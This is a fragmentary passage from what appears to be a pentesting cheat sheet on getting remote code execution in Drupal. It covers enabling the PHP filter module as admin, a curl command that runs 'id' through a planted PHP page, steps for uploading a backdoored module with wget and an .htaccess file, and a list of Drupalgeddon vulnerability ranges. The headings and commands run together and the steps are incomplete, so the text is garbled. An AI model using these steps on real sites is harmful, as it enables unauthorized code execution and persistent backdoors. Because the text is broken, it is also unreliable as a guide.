rce
Leverage the PHP filter module
In old version of Drupal (before version 8), it was possible to log in as an admin and enable PHP filter module, which could allow embedded PHP code.
# /#overlay=admin/modulesRemote code execution
Go to http://drupal-qa."$domain"/user#overlay=node/addcurl -s http://drupal-qa."$domain"/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id | grep uid | cut -f4 -d">"Uploading a backdoored module
#Drupal allow users to upload a new module.
wget --no-check-certificate https://ftp."$domain"/files/projects/captcha-8.x-1.2.tar.gz
#Create a .htaccess file to give ourselves access to the folder.Known vulnerabilities
Drupalgeddon - Affected version 7.0 up to 7.31
Drupalgeddon2 - Affected version prior to 7.58 and 8.5.1
Drupalgeddon3 - Affected versions of Drupal 7.x and 8.xLast updated